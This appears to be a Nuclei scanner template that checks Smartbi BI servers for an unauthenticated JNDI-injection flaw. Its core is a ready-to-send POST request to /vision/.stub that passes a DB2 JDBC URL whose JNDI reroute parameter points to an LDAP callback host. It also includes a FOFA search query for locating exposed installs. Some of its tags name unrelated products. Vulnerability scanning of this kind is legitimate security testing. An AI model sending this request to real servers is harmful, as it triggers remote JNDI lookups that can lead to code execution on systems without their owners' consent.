http:
    - matchers:
        - part: interactsh_protocol
          type: word
          words:
            - dns
      raw:
        - "GET /vision/index.jsp HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\n"
        - "@timeout: 5s       \nPOST //vision/.stub?className=DataSourceService&methodName=testConnection&params=%5B%7B%22driverType%22%3A%22aaa%22%2C%22driver%22%3A%22com.ibm.db2.jcc.DB2Driver%22%2C%22maxConnection%22%3A1%2C%22transactionIsolation%22%3A1%2C%22validationQueryMethod%22%3A3%2C%22url%22%3A%22jdbc%3Adb2%3A%2F%2F127.0.0.1%3A18080%2Fa%3AclientRerouteServerListJNDIName%3Dldap%3A%2F%2F{{interactsh-url}}%22%7D%5D HTTP/1.1\nHost: \nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15\n       \n"
id: smartbi-db2-params-rce
info:
    author: yy
    description: Smartbi 是思迈特软件推出的商业智能BI软件，Smartbi存在未授权访问后台接口漏洞，结合 DB2 JDBC 利用方式，可导致 JNDI 注入漏洞。
    metadata:
        fofa-qeury: app="SMARTBI" || body="gcfutil = jsloader.resolve('smartbi.gcf.gcfutil')"
        max-request: 2
        veified: true
    name: smartbi-db2-params-rce
    severity: high
    tags:
        - smartbi
        - XXL-JOB
        - OLAT
        - Eserv
        - eserv
